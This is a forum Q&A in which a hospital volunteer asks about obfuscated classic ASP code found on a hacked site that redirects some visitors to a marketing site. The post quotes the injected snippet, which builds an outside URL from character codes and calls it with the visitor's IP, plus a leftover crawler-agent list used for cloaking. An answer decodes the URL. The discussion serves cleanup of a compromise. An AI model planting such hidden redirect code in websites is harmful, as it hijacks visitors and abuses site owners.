# Unknown Code in website

Tags: php, html, asp.net

First time user so please guide me.

I am volunteering at a hospital and I am told their website is being redirected to market website.  This is not for all user but it does happen often.  Looking at their code, I see the following

```
<%  'on error resume next   Server.ScriptTimeout=500    dim ipcheck,html    ipcheck = "false"   Public O0OOO000OO   O0OOO000OO = Chr ( 104 ) & Chr ( 116 ) & Chr ( 116 ) & Chr ( 112 ) & Chr ( 58 ) & Chr ( 47 ) & Chr ( 47 ) & Chr ( 49 ) & Chr ( 110 ) & Chr ( 105 ) & Chr ( 108 ) & Chr ( 50 ) & Chr ( 116 ) & Chr ( 104 ) & Chr ( 101 ) & Chr ( 97 ) & Chr ( 114 ) & Chr ( 115 ) & Chr ( 101 ) & Chr ( 110 ) & Chr ( 97 ) & Chr ( 108 ) & Chr ( 46 ) & Chr ( 99 ) & Chr ( 111 ) & Chr ( 109 ) & Chr ( 47 ) & Chr ( 105 ) & Chr ( 112 ) & Chr ( 46 ) & Chr ( 112 ) & Chr ( 104 ) & Chr ( 112 ) & Chr ( 63 ) & Chr ( 105 ) & Chr ( 112 ) & Chr ( 61 ) html = O0O000OO0O(O0OOO000OO&getIP())   If instr(html,"<t@k>")>0 Then    ipcheck = replace(html,"<t@k>","") End If
```

Since I did a little asp.net in college and from the 'dim'.

What I can't tell what the 'chr' is referring to.  I tired using converters online but no good.  Of course, I was told later the site was hacked and I think there is still parts that need to be removed.

SO my question, can you refer me to anything I can check this on or on how to read it? or at least what format is the chr from and I can decode it from there.

I do see that some of the left over part has this

```
  allow_agent=split("baiduspider,sogou,baidu,sosospider,googlebot",",")
```

Any input would help, and sorry if this is out of standard for asking questions, I will get better.

Comment: You can almost guarantee if you see characters being obfiscated like that **its a hack**

Comment: https://msdn.microsoft.com/en-us/library/613dxh46%28v=vs.90%29.aspx?f=255&MSPPError=-2147217396

Answer (score -1, accepted):

It reads:
"http://1nil2thearsenal.com/ip.php?ip="

This chart would decode it:
http://www.realifewebdesigns.com/web-programming/asp-characters.asp

Comment: link only answers should be posted as comments